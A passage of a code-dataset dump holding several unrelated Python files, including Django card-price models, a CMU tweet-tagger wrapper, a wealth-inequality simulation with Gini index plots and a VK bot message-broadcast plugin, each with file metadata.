#\n # Convenience Methods #\n # ####################### # \n def _MoveSelectedElementTo(self, toList):\n fromList = self._GetOppositeListAttribute(toList)\n element = self._GetSelectedElementInList(fromList)\n if element != None:\n index = getattr(self, fromList).IndexOfFirstEqual(element)\n if index != -1:\n getattr(self, fromList).RemoveAt(index)\n getattr(self, toList).Add(element)\n self._selected['right'] = None\n self._selected['left'] = None\n \n def _GetOppositeListAttribute(self, attrName):\n return 'right' if attrName == 'left' else 'left'\n \n def _GetSelectedElementInList(self, listName):\n return self._selected.get(listName, None)\n","sub_path":"Extensions/Deal Package Examples/FPythonCode/ListControlInteraction_DPE.py","file_name":"ListControlInteraction_DPE.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44329671","text":"from django.db import models\r\nfrom django.utils import encoding\r\n\r\nclass Product(models.Model):\r\n\tproductName = models.CharField(default='none', max_length=200)\r\n\ttcgId = models.IntegerField(default=-1, unique=True)\r\n\thiPrice = models.FloatField()\r\n\tlowPrice = models.FloatField()\r\n\tavgPrice = models.FloatField()\r\n\tlink = models.TextField(max_length=200)\r\n\t\r\n\tdef updateFieldsFromProduct(self, productInst):\r\n\t\tself.productName = productInst.productName\r\n\t\tself.tcgId = productInst.tcgId\r\n\t\tself.hiPrice = productInst.hiPrice\r\n\t\tself.lowPrice = productInst.lowPrice\r\n\t\tself.avgPrice = productInst.avgPrice\r\n\t\tself.link = productInst.link\r\n\t\treturn self\r\n\t\r\n\t@classmethod\r\n\tdef create(cls, jsonProductObject):\r\n\t\tproduct = cls()\r\n\t\tproduct.productName = jsonProductObject['name']\r\n\t\tproduct.tcgId = jsonProductObject.get('id', -1)\r\n\t\tproduct.hiPrice = jsonProductObject['hiprice']\r\n\t\tproduct.avgPrice = jsonProductObject['avgprice']\r\n\t\tproduct.lowPrice = jsonProductObject['lowprice']\r\n\t\tproduct.link = jsonProductObject['link']\r\n\t\treturn product\r\n\t\t\r\nclass CardSet(models.Model):\r\n\tsetCode = models.CharField(default='none', max_length=200, unique=True)\r\n\tgathererCode = models.CharField(default='none', max_length=200)\r\n\tname = models.CharField(default='none', max_length=200)\r\n\ttype = models.CharField(default='none', max_length=200)\r\n\tblock = models.CharField(default='none', max_length=200)\r\n\ttotal = models.IntegerField(default=0)\r\n\tcardIds = models.CharField(default='', max_length=500) #array of str \r\n\t\r\n\tdef updateFieldsFromSet(self, setInst):\r\n\t\tself.setCode = setInst.setCode\r\n\t\tself.gathererCode = setInst.gathererCode\r\n\t\tself.name = setInst.name\r\n\t\tself.type = setInst.type\r\n\t\tself.block = setInst.block\r\n\t\tself.cardIds = setInst.cardIds\r\n\t\treturn self\r\n\r\n\tdef getCardIds(self):\r\n\t\tcardIdArr = self.cardIds.replace(' ', '').split(',')\r\n\t\treturn cardIdArr\r\n\r\n\t@classmethod\r\n\tdef create(cls, jsonCardSetObject):\r\n\t\tcardSet = cls()\r\n\t\tcardSet.setCode = jsonCardSetObject['code']\r\n\t\tprint(cardSet.setCode)\r\n\t\tcardSet.gathererCode = jsonCardSetObject.get('gathererCode', 'none')\r\n\t\tcardSet.name = jsonCardSetObject['name']\r\n\t\tcardSet.type = jsonCardSetObject['type']\r\n\t\tcardSet.block = jsonCardSetObject.get('block', 'none')\r\n\t\tcards = []\r\n\t\tfor card in jsonCardSetObject['cards']:\r\n\t\t\t# try:\r\n\t\t\t\t# print(encoding.smart_text(card['name'], encoding='utf-8'))\r\n\t\t\t# except:\r\n\t\t\t\t# print('cannot encode card name')\r\n\t\t\tif(card.get('multiverseid', None) != None):\r\n\t\t\t\tcards.append(card['multiverseid'])\r\n\t\tcardSet.cardIds = str(cards).strip('[]')\r\n\t\treturn cardSet\r\n\t\t\r\nclass Card(models.Model):\r\n\tmultiverseId = models.CharField(default='none', max_length=200, unique=True)\r\n\tname = models.CharField(default='none', max_length=200)\r\n\tcolors = models.CharField(default='', max_length=200) #array of str\r\n\trarity = models.CharField(default='none', max_length=200)\r\n\tformats = models.CharField(default='', max_length=200) #array of str\r\n\tproduct = models.OneToOneField(Product, blank=True, null=True)\r\n\t\r\n\tdef updateFieldsFromCard(self, cardInst):\r\n\t\tmultiverseId = cardInst.multiverseId\r\n\t\tname = cardInst.name\r\n\t\tcolors = cardInst.colors\r\n\t\trarity = cardInst.rarity\r\n\t\tformats = cardInst.formats\r\n\t\tproduct = cardInst.product\r\n\t\treturn self\r\n\t\r\n\t@classmethod\r\n\tdef create(cls, jsonCardObject, product):\r\n\t\tcard = cls()\r\n\t\tcard.multiverseId = jsonCardObject.get('multiverseid', '-1')\r\n\t\tcard.name = jsonCardObject['name']\r\n\t\tcard.colors = str(jsonCardObject.get('colors', '')).strip('[]')\r\n\t\t#print(str(card.colors))\r\n\t\tcard.rarity = jsonCardObject['rarity']\r\n\t\tlegalities = jsonCardObject.get('legalities','')\r\n\t\tformats = []\r\n\t\tfor legalityKey in legalities:\r\n\t\t\tformats.append(str(legalityKey))\r\n\t\t#print('cardName: ' + card.name + ' , formats: ' + str(len(formats)))\r\n\t\tcard.formats = str(formats).strip('[]')\r\n\t\tif(product != None):\r\n\t\t\tcard.product = product\r\n\t\treturn card\r\n\t\r\n\t","sub_path":"backend/dealfinder/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445341777","text":"#!/usr/lical/bin/python3\n# ! -*- coding: utf-8 -*-\n\n# 自作の謎の(w)探索\n# 最大桁から1つずつ消していく。\n# O(10^n)かな?\n\nimport sys\nfrom decimal import Decimal\n\nY, M = (int(i) for i in sys.stdin.readline().split())\n\nYM = (Y-2013)*12+M\npre_i = 0\n\n\ndef cal_ym(q):\n q = Decimal(q)\n return (12*q+(q*(q+1))/Decimal(2))\n\n\ndef tansaku(start, end, step):\n pre_i = start\n for i in range(int(start), int(end), int(step)):\n if YM<=cal_ym(i):\n if step==1:\n return (i)\n else:\n return (tansaku(pre_i, end, step/10))\n else:\n pre_i = i\n\n\nj = tansaku(0, 10**17, 10**16)-1\nu_y = 2013+j\nu_m = YM-cal_ym(j)\nprint(u_y, int(u_m))\n","sub_path":"library_python/AtCoder_Event/utpc2013/utpc2013b_bekkai.py","file_name":"utpc2013b_bekkai.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207729039","text":"import collections\na=dict(collections.Counter('halloklempnerdasistfantastischfluggegecheimen'))\nprint(\"Введите стоп слово\",'\\n',sep='')\nc=str(input())\nf=[0]*len(c)\nb=str('halloklempnerdasistfantastischfluggegecheimen')\nt=float(1)\nq=0 \nfor i in range(len(c)):\n for j in range(len(b)):\n if (c[i]==b[j]):\n f[i]=f[i]+1 \nfor i in range(len(c)):\n if (f[i]==0):\n q=1 \nif (q==1):\n print('Сигизмунд не знает букву')\nelse:\n for i in range(len(c)):\n t=t*(a[c[i]]/len(b))\n print(\"Вероятность равна=\",t)\n \n","sub_path":"Practice/18/Python/PY 18.py","file_name":"PY 18.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109501162","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Simple Python wrapper for runTagger.sh script for CMU's Tweet Tokeniser\nand Part of Speech tagger: http://www.ark.cs.cmu.edu/TweetNLP/\n\nPOS tags are represented with a single ASCII symbol. In brief:\n\n* __Nominal__\n `N` common noun\n `O` pronoun (personal/WH; not possessive)\n `^` proper noun\n `S` nominal + possessive\n `Z` proper noun + possessive\n* __Other open-class words__\n `V` verb incl. copula, auxiliaries\n `A` adjective\n `R` adverb\n `!` interjection\n* __Other closed-class words__\n `D` determiner\n `P` pre- or postposition, or subordinating conjunction\n `&` coordinating conjunction\n `T` verb particle\n `X` existential _there_, predeterminers\n* __Twitter/online-specific__\n `#` hashtag (indicates topic/category for tweet)\n `@` at-mention (indicates another user as a recipient of a tweet)\n `~` discourse marker, indications of continuation of a message across multiple tweets\n `U` URL or email address\n `E` emoticon\n* __Miscellaneous__\n `$` numeral\n `,` punctuation\n `G` other abbreviations, foreign words, possessive endings, symbols, garbage\n* __Other Compounds__\n `L` nominal + verbal (e.g. _i'm_), verbal + nominal (_let's_, _lemme_)\n `M` proper noun + verbal\n `Y` `X` + verbal\n\nModified August 2017 by John Meade\n\"\"\"\n\n\nimport shlex, pexpect\nfrom time import time, sleep\n\n\nprinthead = '[ {:^15} ] '.format( 'Tagger' )\ndef p( msg ): print( printhead + msg )\n\n\nclass TweetTagger:\n\n\n def __init__( self, java_opts='-XX:ParallelGCThreads=2 -Xmx500m', jarpath='ark-tweet-nlp-0.3.2/ark-tweet-nlp-0.3.2.jar' ):\n # NOTE default java options are directly lifted from original\n # java implementation. Example of the executed command:\n # java -XX:ParallelGCThreads=2 -Xmx500m -jar vendor/ark-tweet-nlp-0.3.2/ark-tweet-nlp-0.3.2.jar --output-format conll\n self.cmd = ' '.join([ 'java', java_opts, '-jar', jarpath, '--output-format', 'conll' ])\n self.proc = pexpect.spawn( self.cmd, echo=False )\n self.proc.expect('Listening on stdin for input\\. \\(\\-h for help\\)')\n\n\n def kill( self ):\n self.proc.kill( 1 )\n\n\n def __enter__( self ):\n return self\n\n\n def __exit__( self, typ, value, traceback ):\n self.kill()\n\n\n def _parse_raw_result( self, raw_result ):\n \"\"\"Parse the tab-delimited returned lines, modified from:\n https://github.com/brendano/ark-tweet-nlp/blob/master/scripts/show.py\n \"\"\"\n rows = raw_result.split('\\r\\n')\n for line in rows:\n line = line.strip() # remove '\\n'\n if len(line) > 0:\n if line.count( '\\t' ) == 2:\n parts = line.split( '\\t' )\n tokens = parts[0]\n tags = parts[1]\n confidence = float( parts[2] )\n yield tokens, tags, confidence\n\n\n def batch( self, tweets ):\n \"\"\"Call runTagger.sh on a list of tweets, parse the result, return lists of tuples of (term, type, confidence)\"\"\"\n\n # remove carriage returns and newlines, as they are interpretted as\n # tweet separators by the tagger\n tweets_cleaned = [ tw.replace('\\n', ' ').replace('\\r', ' ') for tw in tweets ]\n message = \"\\n\".join( tweets_cleaned )\n\n # force UTF-8 encoding (from internal unicode type) to avoid .communicate encoding error as per:\n # http://stackoverflow.com/questions/3040101/python-encoding-for-pipe-communicate\n # message = message.encode( 'utf-8' )\n\n # print(message, file=self.proc.stdin, flush=True)\n self.proc.write( (message + '\\n\\n').encode('utf-8') )\n # the output of the tagger will terminate with 4 newlines => use this\n # to detect batch completion\n try:\n self.proc.expect( '\\r\\n\\r\\n\\r\\n', timeout=30 )\n except:\n p('Exception while tagging tweets')\n return []\n\n # parse into a list of strings, ie a result for each input message\n raw = self.proc.before.strip().decode('utf-8')\n # occassionally there is a header to trim off...\n raw = ''.join( raw.split('Detected text input format') ).strip()\n # avoid missing result for empty lines?\n # pos_result = pos_result.replace( \"\\n\\n\", \"\\n\\n\\n\" )\n # split messages by double carriage returns\n raw_results = raw.split( '\\r\\n\\r\\n' )\n # parse each raw result into it's PoS tags\n return [ list( self._parse_raw_result( r ) ) for r in raw_results ]\n\n\nif __name__ == \"__main__\":\n with TweetTagger( jarpath='vendor/ark-tweet-nlp-0.3.2.jar' ) as tw_tag:\n print( \"\\nTweet PoS demo (first call will be slow while Java is booting up)\")\n\n def demo(tweets):\n print( '\\nProcessing: ' + str( tweets ) )\n ti = time()\n res = tw_tag.batch( tweets )\n tf = time()\n print( 'Results: ' + str( res ) )\n print( 'Took: {} seconds'.format( tf - ti ) )\n\n demo([ 'this is a message', 'and a second message' ])\n demo([ 'this is a third message', 'and a fourth message' ])\n demo([ 'this is a fifth message', '' ])\n","sub_path":"CMUTweetTagger.py","file_name":"CMUTweetTagger.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183836609","text":"'''\nComputation of Sequence Charge Decoration\nAuthor: Yu Qi\n'''\n\ndef BranchedSeqCharge(b1, b2, tail, branchpoint):\n # `\n # ` <-- branch1 | b1 and b2 are branch sequences without the \"tail\"\n # ` V\n # ` (NC)_ _ _ _ <--- TAIL (starts after \"NC\") NC(from formula) is branchpoint\n # ,\n # ,\n # , ^\n # , <-- branch2 \\ tail begins at the 5th char (index 4) in this example\n\n total1 = 0\n total2 = 0\n total3 = 0\n\n pCharged = [\"K\", \"H\", \"R\"]\n nCharged = [\"D\", \"E\"]\n\n #Section 1\n #summation from m=2 (second letter of b1 sequence) to N1\n #summation from n=1 (first letter of b1) to m-1 (second to last letter of b1 sequence)\n\n #First we must add the first and second branches together, with NC in between:\n tempstring = b1 + branchpoint\n\n for x in range(0,len(b2)):\n tempstring += b2[len(b2) - x - 1]\n\n for m in range (1, len(tempstring)): #m is index number of the string - in formula it starts at 2 instead of 1\n if(tempstring[m] in pCharged): #assign Q values based on amino\n q1 = 1\n elif(tempstring[m] in nCharged):\n q1 = -1\n else:\n q1 = 0\n for n in range (0, m): #n can be up to m-1, which is essentially c (b/c m = c + 1), but still is the index number of the string\n if(tempstring[n] in pCharged):\n q2 = 1\n elif(tempstring[n] in nCharged):\n q2 = -1\n else:\n q2 = 0\n total1 += q1 * q2 * ((m-n)**0.5)\n print(\"Total1: \" + str(total1) + \"\\n\")\n\n #Section 2\n #to be determined based on sequence indexes, math part is complete.\n\n\n for m in range(0, len(tail)):\n if(tail[m] in pCharged):\n q1 = 1\n elif(tail[m] in nCharged):\n q1 = -1\n else:\n q1 = 0\n mIndex = len(b1) + m + 2\n for n in range(0, len(b1)): #if using for index, these are not proper index values\n if(b1[m] in pCharged):\n q2 = 1\n elif(b1[m] in nCharged):\n q2 = -1\n else:\n q2 = 0\n nIndex = n + 1\n nC = len(b1) + 1\n total2 += (q1*q2*((nC - nIndex)**2))/((mIndex-(nIndex))**(3/2))\n print(\"Total2: \" + str(total2) + \"\\n\")\n\n\n #Section 3\n #to be determined based on sequence indexes, math part is complete.\n\n #concatenate and reverse b2 with branching point\n # for instance \"ABC\"(b2) + \"D\" (branching point) becomes \"DCBA\"\n\n tempb2 = b2 + branchpoint\n tempb2reverse = \"\"\n\n for x in range(0,len(tempb2)):\n tempb2reverse += b2[len(b2) - x - 1]\n\n for m in range(0, len(tempb2reverse)): #if using for index, these are not proper index values\n if(tempb2reverse[m] in pCharged):\n q1 = 1\n elif(tempb2reverse[m] in nCharged):\n q1 = -1\n else:\n q1 = 0\n mIndex = len(b1) + 1 + m\n for n in range(0, len(tail)):\n if(tail[n] in pCharged):\n q2 = 1\n elif(tail[n] in nCharged):\n q2 = -1\n else:\n q2 = 0\n nIndex = len(b1) + n + 2\n nC = len(b1) + 1\n total3 += (q1*q2*((mIndex-nC)**2))/((mIndex+nIndex-(2*(nC)))**(3/2))\n print(\"Total3: \" + str(total3) + \"\\n\")\n\n return total1 + total2 + total3\n\n\n","sub_path":"BranchedSeqCharge.py","file_name":"BranchedSeqCharge.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360226091","text":"#dot = Digraph(comment='The Test Table')\n#dot.node('Root', 'Root')\nimport re\nwith open(\"output_result1.txt\", \"r\") as f:\n a = f.readlines()\n \nfrom graphviz import Digraph\ndot = Digraph(comment='The Test Table')\n# 添加圆点A,A的标签是Dot A\n#dot.node('Root', 'Root')\n \ndata=[]\nFirst_node=[]\nTotal_node=[]\nedge_info=[]\nfor thing in a :\n thing=thing.replace(' ','').replace('\\n','').replace('_name:',' ')\n temp=thing.split(' ')\n id1=temp[0].split('id')[1]\n id1_name=temp[1].split('id')[0]\n id2=temp[1].split('id')[1]\n id2_name=temp[2].split('connection')[0]\n Total_node.append(id1+'+'+id1_name)\n Total_node.append(id2+'+'+id2_name)\n edge_info.append(id1+'+'+id2)\n#for index1,thing1 in enumerate(data):\n# if(index1<100):\n# temp=thing1.split(' ')\n# First_node.append(temp[0])\n# for index2,thing2 in enumerate(temp):\n# Total_node.append(thing2)\n# if(index2100\nnp.random.seed(101)\ndata = np.random.randint(1, 101, (100, 5))\nprint(data)\n\n# Create 2D vis w/Colorbar and Title\nplt.imshow(data, cmap=\"coolwarm\", aspect='auto')\nplt.title('title')\nplt.colorbar()\nplt.show()\n\n# Create pandas dateframe\ndf = pd.DataFrame(data)\nprint(df)\n\n# Show scatter plot of col 0 vs col 1\ndf.plot(x=0, y=1, kind='scatter')\nplt.show()\n\n# Scale data to have minimum of 0 and max of 1\nscaler = preprocessing.MinMaxScaler()\nscaled_data = scaler.fit_transform(data)\nprint(scaled_data)\n\n# Rename columns, split data into training and test\ndf.columns = ['f1', 'f2', 'f3', 'f4', 'label']\nX = df[['f1', 'f2', 'f3', 'f4']]\ny = df[['label']]\n\nX_train, X_test, y_train, y_test = model_selection.train_test_split(\n X, y, test_size=.33, random_state=42)\n\nprint(X_train)\n","sub_path":"review/_exercise.py","file_name":"_exercise.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313026566","text":"__author__ = 'PE20060014 Chen Wang'\n\nimport os\nimport math\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom savegif import create_gif\n\n# 计算基尼系数\ndef gini(initial_money, people, wealth):\n cumul = 0\n ave = np.mean(wealth)\n #print(ave)\n max = ave * people * (people + 1) / 2\n for i in range(people):\n cumul += (people - i) * (ave - wealth[i])\n gini_index = cumul / max\n return gini_index\n\n# 玻尔兹曼分布曲线\ndef fit1(initial_money, people, step):\n x = np.arange(0.5, 0.5 + people)\n y = np.zeros(people)\n for i in range(people):\n y[i] = -initial_money * math.log(1 - x[i] * 1.0 / people)\n x = np.reshape(x, (len(x), 1))\n y = np.reshape(y, (len(y), 1))\n fitline = np.hstack((x, y))\n return fitline\n\n#S1:不允许负债的情况\ndef generate1(days):\n import random\n wealth = []\n order = []\n for i in range(100): #定义100个人的序号\n order.append(i+1)\n for i in range(100): #定义初始财富\n wealth.append(100)\n for j in range(days): #模拟22-65岁 共15695天\n for i in range(100): #模拟每天100个人的财富交换\n if wealth[i]==0: #不可负债\n #break #如果有人财富为0了 就停止游戏\n continue #财富为0时,不支出,游戏继续\n else:\n wealth[i] = wealth[i] - 1\n rand_guy=random.choice([x for x in range(0,100) ]) #100平均分布取出一个人\n wealth[rand_guy] = wealth[rand_guy] + 1\n wealth.sort()#对财富排序\n # 检验财富有无流失,return 10000则没有流失\n # print(sum(wealth))\n gini_index = gini(100, 100, wealth) # 计算基尼系数\n #print(gini_index)\n # 显示100个人的财富柱状图\n #fig1 = plt.figure()\n #玻尔兹曼分布曲线\n fitline = fit1(100, 100, j)\n if ( j % 200 == 0):\n plt.plot(fitline[:, 0], fitline[:, 1], 'r')\n plt.bar(order,wealth,0.5,color=\"blue\")\n plt.title('Scenario1:Debt Disabled\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n #plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario1/'+j//200*str(1)+'.png')\n if(j!=days): #保留最运行结束时的数据\n plt.close()\n gif_name = 'Scenario1.gif'\n pic_path = '../pythonProject/Scenario1/' # 指定文件路径\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n\n#S2:允许负债的情况\ndef generate2(days):\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(100):\n wealth.append(100)\n for j in range(days):#可负债情况不需判断某人的金钱是否为0\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guy=random.choice([x for x in range(0,100) if x!=i])\n wealth[rand_guy]=wealth[rand_guy]+1\n wealth.sort()\n gini_index = gini(100, 100, wealth) # 计算基尼系数\n # 显示100个人的财富柱状图\n # fig1 = plt.figure()\n if ( j % 200 == 0):\n plt.bar(order,wealth,0.5,color=\"blue\")\n plt.title('Scenario2:Debt Enabled\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n #plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario2/'+j//200*str(1)+'.png')\n if(j!=days): #保留最运行结束时的数据\n plt.close()\n gif_name = 'Scenario2.gif'\n pic_path = '../pythonProject/Scenario2/' # 指定文件路径\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n#wealth,order=generate()\n\n#S3:对富人收税的情况:\ndef generate3(days):\n import random\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(100):\n wealth.append(100.0)\n for j in range(days):\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guy=random.choice([x for x in range(0,100) if x!=i])\n if wealth[rand_guy]>=200.0:#对拥有大于200元的玩家征收20%的税\n wealth[rand_guy] = wealth[rand_guy] + 0.5\n wealth_transi = wealth[:]\n for m in range(5):#对最贫穷的2位玩家每人补贴0.25元\n ind=wealth_transi.index(min(wealth_transi))\n wealth[ind]=wealth[ind]+0.1\n wealth_transi[ind]=100000000\n else:\n wealth[rand_guy] = wealth[rand_guy] + 1\n wealth.sort()\n gini_index = gini(100, 100, wealth) # 计算基尼系数\n # 显示100个人的财富柱状图\n # fig1 = plt.figure()\n if (j % 200 == 0):\n plt.bar(order,wealth,0.5,color=\"blue\")\n plt.title('Scenario3:Debt and 50%TAX Enabled \\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n #plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario3/' + j // 200 * str(1) + '.png')\n if(j!=days): #保留最运行结束时的数据\n plt.close()\n gif_name = 'Scenario3.gif'\n pic_path = '../pythonProject/Scenario3/' # 指定文件路径\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n#wealth,order=generate()\n\n#S4:富二代出现\ndef generate4(days):\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(10):#前10位玩家是富二代,生来就比普通玩家多2倍财富\n wealth.append(400.0)\n for i in range(10,100):\n wealth.append(100.0)\n for j in range(days):#模拟15695轮财富分配\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guy=random.choice([x for x in range(0,100) if x!=i])\n wealth[rand_guy]=wealth[rand_guy]+1\n # 排序\n wealth_transi = wealth[:]\n wealth_sort = []\n order_rich = []\n wealth_rich = []\n order_normal = []\n wealth_normal = []\n for i in range(100):\n ind_min = wealth_transi.index(min(wealth_transi))\n wealth_sort.append(min(wealth_transi))\n wealth_transi[ind_min] = float('inf')\n if ind_min in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n order_rich.append(len(wealth_sort) - 1)\n wealth_rich.append(wealth_sort[-1])\n else:\n order_normal.append(len(wealth_sort) - 1)\n wealth_normal.append(wealth_sort[-1])\n gini_index = gini(100, 100, wealth_sort) # 计算基尼系数\n print(gini_index)\n # barchart\n # fig1 = plt.figure()\n if (j % 200 == 0):\n plt.bar(order_rich, wealth_rich, 0.5, color=\"red\")\n plt.bar(order_normal, wealth_normal, 0.5, color=\"blue\")\n plt.title('Scenario4:Born Rich with 400\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario4/' + j // 200 * str(1) + '.png')\n if (j != days): # 保留最运行结束时的数据\n plt.close()\n # plt.show()\n gif_name = 'Scenario4.gif'\n pic_path = '../pythonProject/Scenario4/' # 指定文件路径\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n\n#S5更努力有用吗?\ndef generate5(days):\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(10):\n wealth.append(50)\n for i in range(10,90):\n wealth.append(100)\n for i in range(90,100):\n wealth.append(200) #后10名为初始携带200元的富二代\n for j in range(days):\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guylist1=[x for x in range(0,10) if x!=i]#定义0到9号玩家序号\n rand_guylist2 = [x for x in range(10, 100) if x != i]#定义10到99号玩家序号\n ind=random.randint(0,1000)\n # 前10位玩家得到钱的概率要微大于后90位玩家,几率大了将近万分之一,以此模拟10位更努力的玩家\n if ind<=100:#在0到9号玩家中取一个人的概率是11/1000\n rand_guy = random.choice(rand_guylist1)\n else:#在10到99号玩家中取一个人的概率是(1000-11)/1000\n rand_guy = random.choice(rand_guylist2)\n wealth[rand_guy]=wealth[rand_guy]+1\n #wealth.sort()#为展示前10位玩家财富变化,不进行排序\n # 排序\n wealth_transi = wealth[:]\n wealth_sort = []\n order_rich = []\n wealth_rich = []\n order_hard = []\n wealth_hard = []\n order_normal = []\n wealth_normal = []\n for i in range(100):\n ind_min = wealth_transi.index(min(wealth_transi))\n wealth_sort.append(min(wealth_transi))\n wealth_transi[ind_min] = float('inf')\n if ind_min in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n order_hard.append(len(wealth_sort) - 1)\n wealth_hard.append(wealth_sort[-1])\n elif ind_min in [90, 91, 92, 93, 94, 95, 96, 97, 98, 99]:\n order_rich.append(len(wealth_sort) - 1)\n wealth_rich.append(wealth_sort[-1])\n else:\n order_normal.append(len(wealth_sort) - 1)\n wealth_normal.append(wealth_sort[-1])\n # print(len(order_hard)==len(order_hard),len(order_rich)==len(wealth_rich),len(order_normal)==len(wealth_normal))\n gini_index = gini(100, 100, wealth_sort) # 计算基尼系数\n # barchart\n # fig1 = plt.figure()\n if (j%200==0):\n plt.bar(order_rich, wealth_rich, 0.5, color=\"red\")\n plt.bar(order_hard, wealth_hard, 0.5, color=\"green\")\n plt.bar(order_normal, wealth_normal, 0.5, color=\"blue\")\n plt.title('Scenario5:Hard-working by 0.01% VS Born Rich 200%\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario5/' + j // 200 * str(1) + '.png')\n if (j != days): # 保留最运行结束时的数据\n plt.close()\n # plt.show()\n gif_name = 'Scenario5.gif'\n pic_path = '../pythonProject/Scenario5/' # 指定文件路径\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n\n\n\ndef main():\n day=15695\n generate1(day)\n\nif __name__ == '__main__':\n main()","sub_path":"面向科学问题求解的编程实践/FinalProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483811044","text":"#encoding:utf-8\nimport re\n\n#Const_File_Format=[\"asp\",\"aspx\",\"html\",\"htm\",\"php\"]\np = re.compile(r'(i say,\\nhello)')\n\nfor line in open(\"list.txt\").readlines():\n\tline=line.strip('\\n')\n\tread_file = open(line, 'r').read()\n\tif \"百家乐\" in read_file:\n\t\twith open(\"log.txt\", 'a') as output:\n\t\t\toutput.write(line+\"\\n\")\n\topen(line, 'w').write(p.sub(r'', read_file))","sub_path":"regula/替换.py","file_name":"替换.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"320337427","text":"from handler.base_plugin_command import CommandPlugin\nfrom vk.utils import Wait\nfrom vk.helpers import upload_photo\n\nimport asyncio\nimport aiohttp\nimport io\n\n\nclass DispatchPlugin(CommandPlugin):\n __slots__ = (\"admins\", )\n\n def __init__(self, *commands, prefixes=None, strict=False, admins=()):\n \"\"\"Allows admins to send out messages to users.\"\"\"\n\n super().__init__(*commands, prefixes=prefixes, strict=strict)\n\n self.admins = admins\n\n async def process_message(self, msg):\n if msg.user_id not in self.admins and not msg.meta.get(\"is_moder\"):\n return await msg.answer(\"Вы не администратор.\")\n\n cmd_len = len(msg.meta.get(\"__prefix\", \"\")) + len(msg.meta.get(\"__command\", \"\"))\n\n message = msg.full_text[cmd_len:].strip()\n attachment = \"\"\n\n for a in await msg.get_full_attaches():\n if a.type != \"photo\":\n attachment += str(a) + \",\"\n\n if a.type == \"photo\" and a.url:\n async with aiohttp.ClientSession() as sess:\n async with sess.get(a.url) as resp:\n new_a = await upload_photo(self.api, io.BytesIO(await resp.read()))\n\n if not new_a:\n continue\n\n attachment += str(new_a) + \",\"\n\n await msg.answer(\"Приступаю к рассылке!\")\n\n if await self.dispatch(message, attachment) is False:\n return await msg.answer(\"Ошибка при отправлении! Попробуйте позже!\")\n\n return await msg.answer(\"Рассылка закончена!\")\n\n async def dispatch(self, message, attachment):\n dialogs = await self.bot.api.messages.getDialogs(count=1, preview_length=1)\n\n if not dialogs or \"count\" not in dialogs:\n return False\n\n dialogs = dialogs[\"count\"]\n users = set()\n\n tasks = []\n\n with self.bot.api.mass_request():\n for i in range(int(dialogs / 200) + 1):\n tasks.append(await self.bot.api(wait=Wait.CUSTOM).messages.getDialogs(count=200, preview_length=1))\n\n future = asyncio.gather(*tasks, return_exceptions=True)\n\n await asyncio.wait_for(future, None)\n\n for r in future.result():\n if not r:\n continue\n\n for dialog in r.get(\"items\", []):\n if \"message\" not in dialog or \"user_id\" not in dialog[\"message\"]:\n continue\n\n users.add(int(dialog[\"message\"][\"user_id\"]))\n\n for i, u in enumerate(users):\n await self.bot.api(wait=Wait.NO).messages.send(user_id=u, message=message, attachment=attachment)\n\n if i % 25 == 0:\n await 